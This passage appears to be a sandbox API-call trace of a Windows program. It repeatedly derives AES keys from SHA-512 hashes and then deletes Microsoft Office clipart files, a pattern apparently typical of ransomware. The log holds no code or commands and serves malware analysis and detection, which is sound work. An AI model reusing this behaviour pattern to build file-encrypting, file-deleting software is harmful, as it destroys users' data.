(hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.022] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.022] wcslen (_String="\\\\?\\") returned 0x4 [0196.039] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 1 [0196.039] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf")) returned 1 [0196.041] CryptDestroyKey (hKey=0x9ad278) returned 1 [0196.041] wcslen (_String="OK") returned 0x2 [0196.041] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.041] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.041] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0196.041] CryptDestroyHash (hHash=0x9ad438) returned 1 [0196.041] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0196.043] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0196.043] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.043] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad438) returned 1 [0196.043] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.043] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.043] wcslen (_String="\\\\?\\") returned 0x4 [0196.231] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 1 [0196.231] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf")) returned 1 [0196.232] CryptDestroyKey (hKey=0x9ad738) returned 1 [0196.232] wcslen (_String="OK") returned 0x2 [0196.232] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.232] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.232] CryptDestroyKey (hKey=0x9ad438) returned 1 [0196.232] CryptDestroyHash (hHash=0x9ad138) returned 1 [0196.232] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0196.235] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0196.235] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.235] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad278) returned 1 [0196.235] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.235] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.235] wcslen (_String="\\\\?\\") returned 0x4 [0196.309] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 1 [0196.309] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf")) returned 1 [0196.310] CryptDestroyKey (hKey=0x9ad378) returned 1 [0196.310] wcslen (_String="OK") returned 0x2 [0196.310] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.310] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.310] CryptDestroyKey (hKey=0x9ad278) returned 1 [0196.310] CryptDestroyHash (hHash=0x9ad878) returned 1 [0196.310] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0196.312] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0196.312] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.312] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad7f8) returned 1 [0196.312] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.312] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.312] wcslen (_String="\\\\?\\") returned 0x4 [0196.440] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 1 [0196.440] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf")) returned 1 [0196.441] CryptDestroyKey (hKey=0x9ad178) returned 1 [0196.441] wcslen (_String="OK") returned 0x2 [0196.441] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.441] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.441] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0196.441] CryptDestroyHash (hHash=0x9ad138) returned 1 [0196.441] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0196.444] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0196.444] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.444] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad178) returned 1 [0196.444] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.444] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.444] wcslen (_String="\\\\?\\") returned 0x4 [0196.462] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 1 [0196.462] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf")) returned 1 [0196.463] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0196.463] wcslen (_String="OK") returned 0x2 [0196.463] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.463] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.463] CryptDestroyKey (hKey=0x9ad178) returned 1 [0196.463] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0196.463] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0196.465] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0196.465] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.465] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad578) returned 1 [0196.465] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.465] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.465] wcslen (_String="\\\\?\\") returned 0x4 [0196.587] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 1 [0196.588] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf")) returned 1 [0196.588] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0196.589] wcslen (_String="OK") returned 0x2 [0196.589] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.589] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.589] CryptDestroyKey (hKey=0x9ad578) returned 1 [0196.589] CryptDestroyHash (hHash=0x9ad138) returned 1 [0196.589] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0196.590] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0196.590] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.590] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad4b8) returned 1 [0196.590] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.590] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.590] wcslen (_String="\\\\?\\") returned 0x4 [0196.728] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 1 [0196.728] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf")) returned 1 [0196.729] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0196.729] wcslen (_String="OK") returned 0x2 [0196.729] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.729] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.729] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0196.729] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0196.729] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0196.731] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0196.731] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.731] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad538) returned 1 [0196.731] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.731] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.731] wcslen (_String="\\\\?\\") returned 0x4 [0196.850] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 1 [0196.850] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf")) returned 1 [0196.851] CryptDestroyKey (hKey=0x9ad738) returned 1 [0196.851] wcslen (_String="OK") returned 0x2 [0196.852] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.852] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.852] CryptDestroyKey (hKey=0x9ad538) returned 1 [0196.852] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0196.852] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0196.854] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0196.854] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.854] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad7b8) returned 1 [0196.854] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.854] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.854] wcslen (_String="\\\\?\\") returned 0x4 [0197.075] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 1 [0197.075] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf")) returned 1 [0197.076] CryptDestroyKey (hKey=0x9ad438) returned 1 [0197.076] wcslen (_String="OK") returned 0x2 [0197.076] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.076] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.076] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0197.076] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0197.076] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0197.078] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0197.078] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.078] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad338) returned 1 [0197.078] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.078] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.078] wcslen (_String="\\\\?\\") returned 0x4 [0197.090] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 1 [0197.090] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf")) returned 1 [0197.091] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0197.091] wcslen (_String="OK") returned 0x2 [0197.091] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.091] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.091] CryptDestroyKey (hKey=0x9ad338) returned 1 [0197.091] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0197.091] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0197.092] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0197.092] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.092] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad238) returned 1 [0197.092] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.092] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.093] wcslen (_String="\\\\?\\") returned 0x4 [0197.226] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 1 [0197.226] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf")) returned 1 [0197.227] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0197.227] wcslen (_String="OK") returned 0x2 [0197.227] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.228] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.228] CryptDestroyKey (hKey=0x9ad238) returned 1 [0197.228] CryptDestroyHash (hHash=0x9ad138) returned 1 [0197.228] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0197.229] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0197.229] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.229] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad5f8) returned 1 [0197.229] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.229] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.230] wcslen (_String="\\\\?\\") returned 0x4 [0197.258] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 1 [0197.258] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf")) returned 1 [0197.259] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0197.259] wcslen (_String="OK") returned 0x2 [0197.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.259] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0197.259] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0197.260] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0197.262] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0197.262] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.262] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad238) returned 1 [0197.262] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.262] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.262] wcslen (_String="\\\\?\\") returned 0x4 [0197.267] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 1 [0197.267] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf")) returned 1 [0197.269] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0197.269] wcslen (_String="OK") returned 0x2 [0197.269] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.269] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.269] CryptDestroyKey (hKey=0x9ad238) returned 1 [0197.269] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0197.269] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0197.271] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0197.271] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.271] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad5f8) returned 1 [0197.271] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.271] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.271] wcslen (_String="\\\\?\\") returned 0x4 [0197.311] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 1 [0197.311] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf")) returned 1 [0197.313] CryptDestroyKey (hKey=0x9ad438) returned 1 [0197.313] wcslen (_String="OK") returned 0x2 [0197.313] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.313] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.313] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0197.313] CryptDestroyHash (hHash=0x9ad478) returned 1 [0197.313] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0197.318] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44492c | out: phHash=0x1d44492c) returned 1 [0197.318] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.318] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d444930 | out: phKey=0x1d444930*=0x9ad778) returned 1 [0197.318] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.318] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.318] wcslen (_String="\\\\?\\") returned 0x4 [0197.352] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 1 [0197.352] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf")) returned 1 [0197.353] CryptDestroyKey (hKey=0x9ad338) returned 1 [0197.353] wcslen (_String="OK") returned 0x2 [0197.353] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.353] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.353] CryptDestroyKey (hKey=0x9ad778) returned 1 [0197.353] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0197.353] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0197.356] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0197.356] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.356] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad178) returned 1 [0197.356] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.356] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.356] wcslen (_String="\\\\?\\") returned 0x4 [0197.473] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 1 [0197.473] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf")) returned 1 [0197.474] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0197.474] wcslen (_String="OK") returned 0x2 [0197.474] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.474] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.474] CryptDestroyKey (hKey=0x9ad178) returned 1 [0197.474] CryptDestroyHash (hHash=0x9ad478) returned 1 [0197.474] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0197.476] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0197.476] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.476] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad138) returned 1 [0197.476] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.476] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.477] wcslen (_String="\\\\?\\") returned 0x4 [0197.530] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 1 [0197.530] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf")) returned 1 [0197.532] CryptDestroyKey (hKey=0x9ad238) returned 1 [0197.532] wcslen (_String="OK") returned 0x2 [0197.532] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.532] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.532] CryptDestroyKey (hKey=0x9ad138) returned 1 [0197.532] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0197.532] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0197.534] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0197.535] CryptHashData (hHash=0x9ad638, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.535] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad638, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad5b8) returned 1 [0197.535] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.535] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, 